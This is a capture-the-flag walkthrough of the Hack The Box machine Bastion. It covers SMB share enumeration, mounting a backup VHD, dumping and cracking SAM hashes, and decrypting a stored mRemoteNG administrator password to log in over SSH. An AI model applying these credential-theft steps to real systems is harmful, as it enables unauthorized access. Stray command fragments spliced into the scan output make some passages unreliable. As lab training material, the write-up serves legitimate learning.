This post documents the complete walkthrough of Bastion, an active vulnerable VM created by L4mpje and hosted at Hack The Box

 

Description
Bastion is a active Windows Server 2016 box, some suggest that the box is easier to solve with a windows machine (example: Commando VM) but if your are comfortable with Linux you can solve the box using Kali Linux.

 


 

❯ Information Gathering

Starting with a full nmap scan

Nmap cheat sheet

❯ nmap -sV -sC -p- -oN bastion.nmap -T4 bastion.htb
Nmap scan report for bastion (10.10.10.134)
Host is up (0.096s latency).
Not shown: 65522 closed ports
PORT      STATE SERVICE      VERSION
22/tcp    open  ssh          OpenSSH for_Windows_7.9 (protocol 2.0)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
49670/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -39m23s, deviation: 1h09m15s, median: 35s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3mount 
-
t cifs 
//10.10.10.134/Backups -o user=guest,password= /mnt/backups

)
|   Computer name: Bastion
|   NetBIOS computer name: BASTION\x00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required

We find that SMB port 445 is open. We can enumerate the SMB shares on port 445 using the nmap script smb-enum-shares.nse on port 445.

❯ nmap --script=smb-enum-shares.nse -p445 -oA smb_p445 10.10.10.134
Nmap scan report for bastion (10.10.10.134)
Host is up (0.096s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-enum-shares: 
|   account_used: guest
|   \\10.10.10.134\ADMIN$: 
|     Type: STYPE_DISKTREE_HIDDEN
|     Comment: Remote Admin
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.10.10.134\Backups: 
|     Type: STYPE_DISKTREE
|     Comment: 
|     Anonymous access: <none>
|     Current user access: READ
|   \\10.10.10.134\C$: 
|     Type: STYPE_DISKTREE_HIDDEN
|     Comment: Default share
|     Anonymous access: <nonNT_STATUS_INVALID_INFO_CLASS listing \*

|     Current user access: <NT_STATUS_INVALID_INFO_CLASS listing \*mount 
-
t cifs 
//10.10.10.134/Backups -o user=guest,password= /mnt/backups



|   \\10.10.10.134\IPC$: 
|     Type: STYPE_IPC_HIDDENNT_STATUS_INVALID_INFO_CLASS listing \*

|     Comment: Remote IPC
|     Anonymous access: <none>systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
|_    Current user access: READ/WRITE

It looks like we have read/write access to the IPC$ share, and read-only access to the Backup share. From the output we find that files we upload to the Development share will be stored in the path C:\etc\Development.

We can connect and browse the contents of the SMB shares using the smbclient or smbclient.py

❯ ./smbclient.py [email protected]
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation

Password:
Type help for list of commands
# shares
ADMIN$
Backups
C$
IPC$
# use Backups
# ls
drw-rw-rw-          0  Wed Jul  3 14:02:04 2019 .
drw-rw-rw-          0  Wed Jul  3 14:02:04 2019 ..
drw-rw-rw-          0  Wed Jul  3 13:44:36 2019 cJIoGbUMXT
-rw-rw-rw-        260  Wed Jul  3 13:43:13 2019 nmap-test-file
-rw-rw-rw-        116  Wed Jul  3 14:11:58 2019 note.txt
-rw-rw-rw-     339096  Wed Jul  3 13:43:14 2019 PsExec.exe
-rw-rw-rw-          0  Wed Jul  3 13:43:14 2019 SDT65CB.tmp
drw-rw-rw-          0  Wed Jul  3 13:04:19 2019 WindowsImageBackup
drw-rw-rw-          0  Wed Jul  3 14:02:04 2019 wqybfGGmht
drw-rw-rw-          0  Wed Jul  3 14:00:47 2019 XYhxeWtmbq
# get note.txt

In the Backup share there is a file note.txt

note.txt
Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.

The note doesn’t seem to offer any hints. We can mount the Backups share on kali linux

Requirements: $ sudo apt install cifs-utils

mount the Backup share using the mount command

mount -t cifs //10.10.10.134/Backups -o user=Bad3r,password= /mnt/backups

Now we can access the files directly from /mnt/backups

while exploring the share in the path ./WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351

❯ cd /mnt/Backup/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351
❯ ls -alh       
total 5.1G
drwxr-xr-x 2 root root 8.0K Feb 22 07:45 ./
drwxr-xr-x 2 root root 4.0K Feb 22 07:45 ../
-rwxr-xr-x 1 root root  37M Feb 22 07:44 9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd*
-rwxr-xr-x 1 root root 5.1G Jul  3 13:37 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd*
-rwxr-xr-x 1 root root 1.2K Feb 22 07:45 BackupSpecs.xml*
-rwxr-xr-x 1 root root 1.1K Feb 22 07:45 cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml*
-rwxr-xr-x 1 root root 8.8K Feb 22 07:45 cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml*
-rwxr-xr-x 1 root root 6.4K Feb 22 07:45 cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml*
-rwxr-xr-x 1 root root 2.9K Feb 22 07:45 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml*
-rwxr-xr-x 1 root root 1.5K Feb 22 07:45 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml*
-rwxr-xr-x 1 root root 1.5K Feb 22 07:45 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml*
-rwxr-xr-x 1 root root 3.8K Feb 22 07:45 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml*
-rwxr-xr-x 1 root root 3.9K Feb 22 07:45 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml*
-rwxr-xr-x 1 root root 7.0K Feb 22 07:45 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml*
-rwxr-xr-x 1 root root 2.3M Feb 22 07:45 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml*

there is two vhd files VHD (Virtual Hard Disk) is a file format which represents a virtual hard disk drive (HDD). It may contain what is found on a physical HDD, such as disk partitions and a file system, which in turn can contain files and folders. It is typically used as the hard disk of a virtual machine. That seems promising.

One of the vhd files (9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd) is 5.1G and it looks like a backup of the Bastion box instead of downloading it we’ll just remotely mount it to Kali Linux using guestmount

Requirements: apt-get install libguestfs-tools

❯ guestmount --add /mnt/Backup/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro /mnt/vhd

now navigate to /mnt/vhd to browse the backup files

❯ cd /mnt/vhd                     
❯ ls -alh                      
total 2.0G
drwxrwxrwx 1 root root  12K Feb 22 07:39  ./
drwxr-xr-x 5 root root 4.0K Jul  2 23:36  ../
drwxrwxrwx 1 root root    0 Feb 22 07:39 '$Recycle.Bin'/
-rwxrwxrwx 1 root root   24 Jun 10  2009  autoexec.bat*
-rwxrwxrwx 1 root root   10 Jun 10  2009  config.sys*
lrwxrwxrwx 2 root root   14 Jul 14  2009 'Documents and Settings' -> /sysroot/Users
-rwxrwxrwx 1 root root 2.0G Feb 22 07:38  pagefile.sys*
drwxrwxrwx 1 root root    0 Jul 13  2009  PerfLogs/
drwxrwxrwx 1 root root 4.0K Jul 14  2009  ProgramData/
drwxrwxrwx 1 root root 4.0K Apr 11  2011 'Program Files'/
drwxrwxrwx 1 root root    0 Feb 22 07:39  Recovery/
drwxrwxrwx 1 root root 4.0K Feb 22 07:43 'System Volume Information'/
drwxrwxrwx 1 root root 4.0K Feb 22 07:39  Users/
drwxrwxrwx 1 root root  16K Feb 22 07:40  Windows/

 


 

❯ Own User

From the nmap test we now that OpenSSH is running on the box. we need to find a username and a password to access the box. Security Account Manager(SAM) is the database file in Windows which stores user passwords. To extract the hash from SAM we need to navigate to /mnt/vhd/Windows/System32/config/ and dump the hash using samdump2

❯ cd /mnt/vhd/Windows/System32/config/
❯ samdump2 SYSTEM SAM                   
*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::

The format of the output is \*status\* Username:UID:NT hash: NTLM hash modern windows systems use NTLM for authentication and Bastion is running Windows Server 2016 so we need to crack the NTLM hash of the user L4mpje. To save time we’ll use https://hashkiller.co.uk/Cracker/NTLM to crack the hash

hashkiller.png

Great we found the Password now we can ssh to Bastion as L4mpje

❯ ssh [email protected]

Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.                                  

[email protected] C:\Users\L4mpje>whoami             
bastion\l4mpje

[email protected] C:\Users\L4mpje>find /c /v "Bad3r"  Desktop\user.txt                   

---- &nbsp;---- &nbsp;-- DESKTOP\USER.TXT: 1

 


 

❯ Privilege escalation: Own Root

Now that we have a low-priv shell we continue enumerating the system to find a way to get a administrator/root shell. Some programs on the system might be vulnerable to privilege escalation

dir /a "C:\Program Files (x86)"

programs.png

Notice the program mRemoteNG is a remote connections manager that allows you to view all of remote connections. mRemoteNG stores connection information in plain text by default mRemoteNG - issues: 159.

We can download the mRemoteNG files to explore them locally using scp

❯ scp [email protected]:/Users/L4mpje/AppData/Roaming/mRemoteNG/* ./mRemoteNG/
[email protected]'s password: 
confCons.xml                                                                   100% 6316    64.6KB/s   00:00    
confCons.xml.20190222-1402277353.backup                                        100% 6194    63.9KB/s   00:00    
confCons.xml.20190222-1402339071.backup                                        100% 6206    64.4KB/s   00:00    
confCons.xml.20190222-1402379227.backup                                        100% 6218    64.0KB/s   00:00    
confCons.xml.20190222-1403070644.backup                                        100% 6231    63.7KB/s   00:00    
confCons.xml.20190222-1403100488.backup                                        100% 6319    65.3KB/s   00:00    
confCons.xml.20190222-1403220026.backup                                        100% 6318    66.2KB/s   00:00    
confCons.xml.20190222-1403261268.backup                                        100% 6315    62.1KB/s   00:00    
confCons.xml.20190222-1403272831.backup                                        100% 6316    65.0KB/s   00:00    
confCons.xml.20190222-1403433299.backup                                        100% 6315    64.6KB/s   00:00b0e6c60b82cf96e9855ac1656a9e90c7    
confCons.xml.20190222-1403486580.backup                                        100% 6316    64.8KB/s   00:00    
extApps.xml                                                                    100%   51     0.5KB/s   00:00    
mRemoteNG.log                                                                  100% 5217    53.6KB/s   00:00    
pnlLayout.xml                                                                  100% 2245    23.5KB/s   00:00    

 

confCons.xml

confcons.png

In the file confCons.xml we find the Administrator account hashed password

Username="Administrator" Domain="" Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="

We can use mremoteng-decrypt to decrypt the hash

❯ python3 mremoteng_decrypt.py -s "aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="
Password: thXLHM96BeKL0ER2

Now we can ssh to the box using the Administrator account

❯ ssh [email protected]

Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

[email protected] C:\Users\Administrator>find /c /v "Bad3r"  Desktop\root.txt

---- &nbsp;---- &nbsp;-- DESKTOP\ROOT.TXT: 1